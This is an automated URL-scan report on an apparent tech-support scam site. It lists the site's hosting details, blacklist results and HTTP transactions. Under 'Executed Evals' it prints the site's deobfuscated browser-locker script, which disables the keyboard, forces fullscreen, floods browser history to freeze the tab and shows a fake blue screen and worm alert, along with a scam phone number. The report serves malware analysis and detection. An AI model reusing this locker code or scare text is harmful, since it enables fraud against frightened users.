Overview

URL bfswqrt.gq
IP50.62.22.142
ASNAS26496 GoDaddy.com, LLC
Location United States
Report completed2018-07-20 18:01:43 CEST
StatusLoading report..
urlquery Alerts Scam / Cryptowall detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 50.62.22.142

Date UQ / IDS / BL URL IP
2018-07-20 18:13:10 +0200
1 - 0 - 1 bfswqrt.ga/iedge/security.php 50.62.22.142
2018-07-20 17:43:41 +0200
1 - 1 - 0 bfswqrt.ga/fir/security.php 50.62.22.142
2018-07-20 17:35:09 +0200
3 - 1 - 0 bfswqrt.ga 50.62.22.142
2018-07-20 17:31:56 +0200
3 - 0 - 0 bfswqrt.gq 50.62.22.142
2018-07-18 19:12:40 +0200
3 - 1 - 7 upsrtce.gq 50.62.22.142
2018-07-17 01:48:50 +0200
3 - 3 - 0 lksdert.ga/wm 50.62.22.142
2018-07-17 01:46:18 +0200
0 - 0 - 0 lksdert.ga 50.62.22.142
2018-07-17 01:36:55 +0200
0 - 0 - 0 50.62.22.142 50.62.22.142
2018-07-03 00:44:27 +0200
0 - 0 - 0 50.62.22.142 50.62.22.142
2018-06-29 20:54:27 +0200
3 - 3 - 7 cbqaktsh.gq/ 50.62.22.142

Last 10 reports on ASN: AS26496 GoDaddy.com, LLC

Date UQ / IDS / BL URL IP
2019-06-20 11:06:29 +0200
0 - 0 - 0 50.63.202.51 50.63.202.51
2019-06-20 10:54:14 +0200
0 - 0 - 0 x.co/6nsMz 45.40.140.1
2019-06-20 10:52:58 +0200
0 - 0 - 0 x.co/6nsMz 45.40.140.1
2019-06-20 10:49:30 +0200
0 - 0 - 0 https://x.co/6nsMz 45.40.140.1
2019-06-20 07:27:18 +0200
0 - 0 - 0 wifiservicepro.com 50.63.202.47
2019-06-20 07:26:40 +0200
0 - 0 - 0 www.freedompop.com.mx 184.168.221.47
2019-06-20 07:00:56 +0200
0 - 0 - 0 www.bdargo.com 50.63.124.28
2019-06-20 04:57:54 +0200
0 - 0 - 0 austin1020.com/?reqp=1&reqr 184.168.221.69
2019-06-20 04:00:00 +0200
0 - 0 - 0 asiabizpro.info 107.180.41.83
2019-06-20 03:29:27 +0200
0 - 0 - 0 cairoscene.me/Business/egypt-top-export-uae 184.168.131.241

Last 1 reports on domain: bfswqrt.gq

Date UQ / IDS / BL URL IP
2018-07-20 17:31:56 +0200
3 - 0 - 0 bfswqrt.gq 50.62.22.142


JavaScript

Executed Scripts (13)


Executed Evals (1)

#1 JavaScript::Eval (size: 3106, repeated: 1) - SHA256: 0650a162ced3ca9e279ed32a7f346d3e4533d8c8e838e880501e104b9f504b0f

                                        $(function() {
    if (isFirefox) {
        $("a").click(function(e) {
            e.preventDefault()
        });
        var e = ["pushState", "onbeforeunload", "", "returnValue", "onload", "toString"];
        o = e, u = 325,
            function(e) {
                for (; --e;) o.push(o.shift())
            }(++u);
        var n = function(n, t) {
            return e[n -= 0]
        };
        t = text, window[n("0x0")] = function(e) {
            var o = n("0x1") + t;
            return e[n("0x2")] = o, o
        }, window[n("0x3")] = function() {
            if (confirm("" + t))
                for (var e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e);
            else
                for (e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e)
        }
    }
    var t, o, u, r, c, i, l;
    if (isChrome || isOpera) {
        var d = !1;
        $("head").append('<script src="./js/jquery.js"><\/script>'), $("head").append('<link href="./css/main.css" rel="stylesheet">'), document.getElementById("audio").play(), window.onkeydown = function(e) {
            return !1
        }, window.onkeypress = function(e) {
            return !1
        }, onbeforeunload = function() {
            return alert("??????? ESC, ????? ??????? ????????!"), "??????? ESC, ????? ??????? ????????!"
        }, document.oncontextmenu = new Function("return false");
        for (var s = 0; s < 0; s++) alert(text);

        function a() {
            d ? (document.getElementById("blue-screen").style.display = "block", document.getElementsByTagName("body").item(0).setAttribute("class", "past")) : d = !0
        }

        function m() {
            document.fullscreenElement || document.mozFullScreenElement || document.webkitFullscreenElement || (document.documentElement.requestFullscreen ? document.documentElement.requestFullscreen() : document.documentElement.mozRequestFullScreen ? document.documentElement.mozRequestFullScreen() : document.documentElement.webkitRequestFullscreen && document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT)), window.open("blue.php", "Alert", "width=1,height=1,scrolling=yes,fullscreen=yes,left=3000,top=3000")
        }
        document.getElementById("chrome-alerts").style.display = "block", document.addEventListener("keyup", function(e) {
            27 == e.keyCode && m()
        }, !1), document.addEventListener("keyup", function(e) {
            122 != e.keyCode && 17 != e.keyCode && 18 != e.keyCode && 13 != e.keyCode || (a(), m())
        }, !1), window.onload = function() {
            document.onclick = function(e) {
                e = e || event, target = e.target || e.srcElement, target.tagName, m(), a()
            }
        }, addEventListener("click", function() {
            a();
            var e = document.documentElement;
            (e.requestFullScreen || e.webkitRequestFullScreen || e.mozRequestFullScreen).call(e)
        }), window.addEventListener("resize", function() {
            $("body").css("overflow", "hidden"), $(".popup-alert").stop().animate({
                bottom: "-10px",
                opacity: 1
            }, 500), document.getElementById("audio").play(), screen.width, window.innerWidth, window.setInterval(function() {
                for (var e = 0; e < 100; e++) history.pushState(0, 0, e)
            }, 500)
        })
    }
    if (isIE || isSafari) {
        $("#blue-screen,.chrome-alert").hide();
        var f = ["onmouseout", "body", "addEventListener", "mouseout", "*************************************************\nRDN/YahLover.worm!055BCCAC9FEC Infection\n*************************************************\n\n", "attachEvent"];
        i = f, l = 361,
            function(e) {
                for (; --e;) i.push(i.shift())
            }(++l);
        var y = function(e, n) {
            return f[e -= 0]
        };
        r = text, c = text, alert(r), document[y("0x0")][y("0x1")] ? document[y("0x0")][y("0x1")](y("0x2"), function(e) {
            alert(y("0x3") + r)
        }, !1) : document[y("0x0")][y("0x4")](y("0x5"), function(e) {
            alert(r)
        }), window.onbeforeunload = function() {
            return c
        }
    }
});
                                    

Executed Writes (3)

#1 JavaScript::Write (size: 15, repeated: 2) - SHA256: fadc4663cec73362b18293cee8da77c79bfe23af94b56af7711730d72bcbb2c3

                                        +1 - 888 - 348 - 1617
                                    

#2 JavaScript::Write (size: 50, repeated: 1) - SHA256: c3f5f9996575314b7e02e5f36f9cfb04424de9b52da48c860b562ce4e37dd4c3

                                        < span style = "color:#7fff7f" > +1 - 888 - 348 - 1617 < /span>
                                    

#3 JavaScript::Write (size: 67, repeated: 1) - SHA256: 59d5d452c8dc7921ef6b063343058f1bad9dea141baae622ceca624c6ea34035

                                        < span style = "font-size:22;font-weight:bold;" > +1 - 888 - 348 - 1617 < /span>
                                    


HTTP Transactions (23)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 20 Jul 2018 16:01:12 GMT
Server: Apache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text
Size:   36928
Md5:    63c58b586c4e04a2996f37f9cffbdcdf
Sha1:   c7b815f57c09c973b15d2d57459bc1a8b05008ed
Sha256: dc0ba789dcc63b12425a34e98dd3a71d3fcf7e44f8b1250e5e596eac655cca0d
                                        
                                            GET /chrome-assests/alert.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 2981
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   2981
Md5:    5196ccfee9569b0be1fb4a4fb0189f70
Sha1:   d0d701a487759e10831c7ba2c503855ab856ccea
Sha256: b3679448a88b0b8f35c8947ec3a1591436bffcc752c2e96f946626d990502ba6
                                        
                                            GET /chrome-assests/style.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:34 GMT
Accept-Ranges: bytes
Content-Length: 23238
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII English text, with very long lines
Size:   23238
Md5:    e74fa9c2311b591291e28b68eaf6d0c7
Sha1:   6f97982754bbe9b8c4cd6524e8e0490a541f86f3
Sha256: 8e3025342e6473670fbb8bf4df98a8454c75a2b288fd54dba9bbca8e9e3c9438
                                        
                                            GET /chrome-assests/translator.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:36 GMT
Accept-Ranges: bytes
Content-Length: 20763
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   20763
Md5:    26c0245f59b273d110d73a343ca33fc1
Sha1:   ac49c860727f5f16196a338128bb5a909e53d3ce
Sha256: 8e518d27455b893e291bf603d02b9c3d7f417ca2e6cd3c9f9833c3c16a18633d
                                        
                                            GET /chrome-assests/iframe.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 185
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text
Size:   185
Md5:    ff327d44c7800f0e8483ad6f7a05204c
Sha1:   777c24b9bf141ce17f62749e1a94ca6a319f2719
Sha256: cb1194ccca4f9765c5a332bba8506c4d960f13b54c830a3dbde986eac8e3d2b9
                                        
                                            GET /chrome-assests/retreaver.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:40 GMT
Accept-Ranges: bytes
Content-Length: 16164
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   16164
Md5:    c7f736410d8fd53b1fcbeb55621122b4
Sha1:   75f9041b398604e62c6de857921838c8ea8413ef
Sha256: 5e944017e7e53e4654ad11fb20fca627e5e7c49fb9aab62fbde3aef3b51f2fff
                                        
                                            GET /chrome-assests/jquery-1.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:44 GMT
Accept-Ranges: bytes
Content-Length: 95930
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   95930
Md5:    019c5fb7c4771808dc65e1096c771348
Sha1:   44a33096a0498722bc286c5f190d37b070db2d23
Sha256: c8963b6bd2ca8497603794bf9adcbff7a3ea55c9c3edef3d5a992405ee256a90
                                        
                                            GET /chrome-assests/bootstrap.css HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Sat, 25 Nov 2017 05:22:42 GMT
Accept-Ranges: bytes
Content-Length: 121291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII C program text, with very long lines
Size:   121291
Md5:    69911a571506910fe2beddc7ed1f1e7e
Sha1:   a995df4c3a89c7c012af30857b61bef6021ab608
Sha256: cbbd6c980d02125fe27e5752e9f47dfa55845794b0d4fc0444a4211117bee6e5
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /fir/ HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Fri, 20 Jul 2018 16:01:13 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2018 03:06:22 GMT
Accept-Ranges: bytes
Content-Length: 18078
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  UTF-8 Unicode English text, with very long lines, with CRLF line terminators
Size:   18078
Md5:    ba2e4ce56c2b34f75889797881faea03
Sha1:   2e0d22be949a4ea19833c4638e29d66c1fb917f7
Sha256: 556614a48bec490e1615b88ea97b360f3ec7c5e7737c6bef8f70a4231ad47aa8

Alerts:
  urlquery:
    - Scam / Cryptowall detected
                                        
                                            GET /fir/img/bg-3.jpg HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:56 GMT
Accept-Ranges: bytes
Content-Length: 3975
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   3975
Md5:    81478c4a3b80a6e8653d69f0ca5891c2
Sha1:   455d4b4e3199c42b709d0969d86bbf1ed11ab94d
Sha256: b3af1026630c44ba25ea1e3bb86c15d9a0c1de5d9b19633fb2205488fba06e7e
                                        
                                            GET /fir/img/defender.png HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:54 GMT
Accept-Ranges: bytes
Content-Length: 13386
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 230 x 193, 8-bit/color RGBA, non-interlaced
Size:   13386
Md5:    02038697048ee6bd245a1a7bf533d2b8
Sha1:   c5c85f99b3a82aeef1a90d84559d5f4cc402215b
Sha256: 7ce2ae13d717596ff63a6d0694e87f94d96246a2d5fa7d8d153fb17af7d0d42d
                                        
                                            GET /fir/img/bg-1.jpg HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:54 GMT
Accept-Ranges: bytes
Content-Length: 12859
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   12859
Md5:    070b78fb721a3489d079467f6d7397e6
Sha1:   95ecd3e20c235a80617c29553c362576fb935f88
Sha256: 2a515626327b3a78913b0a27d3b7ddbd2e3a8a9b54c6e133a69ae7fe52d33870
                                        
                                            GET /fir/js/jquery.min.js HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         50.62.22.142
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 20 Jul 2018 16:01:14 GMT
Server: Apache
Last-Modified: Fri, 15 Jun 2018 06:43:56 GMT
Accept-Ranges: bytes
Content-Length: 97244
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   97244
Md5:    bdc2b7efb1faf219d65edfe253a103e9
Sha1:   4921529fc15b8133f2fe65b3bebf53d1e9ef8579
Sha256: 95914789b5f3307a3718679e867d61b9d4c03f749cd2e2970570331d7d6c8ed9
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    09310a3e208a93943eccf956d8fc36d1
Sha1:   8eff4dcc08a7c8131acca50c271dd8d275ad3f68
Sha256: 7f6d270f49f89e70e91cf1b27c526f97ce96681b82481da224e544d89291020c
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /gtag/js?id=UA-116176892-2 HTTP/1.1 
Host: www.googletagmanager.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.8
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=UTF-8
                                        
Access-Control-Allow-Origin: http://www.googletagmanager.com
Access-Control-Allow-Headers: Cache-Control
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 20 Jul 2018 16:01:15 GMT
Expires: Fri, 20 Jul 2018 16:01:15 GMT
Cache-Control: private, max-age=900
Server: Google Tag Manager (scaffolding)
X-XSS-Protection: 1; mode=block
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   25190
Md5:    5f5ac2d34f5022f3feab12335c0ab41f
Sha1:   827865710cd3e77c1f660bcfc63d58908106cd2d
Sha256: b07072de4f6d6b0f79f84aa1233b4e5a486709e6eda0e85b1438254da073b775
                                        
                                            GET /analytics.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 20 Jul 2018 15:22:10 GMT
Expires: Fri, 20 Jul 2018 17:22:10 GMT
Last-Modified: Fri, 18 May 2018 01:10:24 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 14386
Cache-Control: public, max-age=7200
Age: 2345
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   14386
Md5:    b3de885583a477d4e31568948d6bebd7
Sha1:   2ce8d853244dde551c41d5207d6f71c567bde8c6
Sha256: e1bb5aa555a0d875e2a67884ceaa0629e08994a8aabadc2fac5b6915793dbf75
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: bfswqrt.gq
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         50.62.22.142
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 20 Jul 2018 16:01:15 GMT
Server: Apache
Content-Length: 328
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   328
Md5:    301fa7ceb5b3c291d4bbeee953048686
Sha1:   758d921efd60d4e9f0f6d77648ccc500c8611fea
Sha256: 6b62a3658ad247e8f30d3e9f35da5e00ffac1ea09785bd1f0a9830f659cf01da
                                        
                                            GET /r/collect?v=1&_v=j68&a=683440925&t=pageview&_s=1&dl=http%3A%2F%2Fbfswqrt.gq%2Ffir%2F&ul=en-us&de=UTF-8&dt=MICROSOFT%20SECURITY%20WARNING&sd=24-bit&sr=1176x885&vp=1168x776&je=1&fl=10.0%20r45&_u=IEBAAUQ~&jid=978258787&gjid=2043602346&cid=1953986344.1532102476&tid=UA-116176892-2&_gid=1988296310.1532102476&_r=1&gtm=u6t&z=51689673 HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bfswqrt.gq/fir/

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Allow-Origin: *
Date: Fri, 20 Jul 2018 16:01:16 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
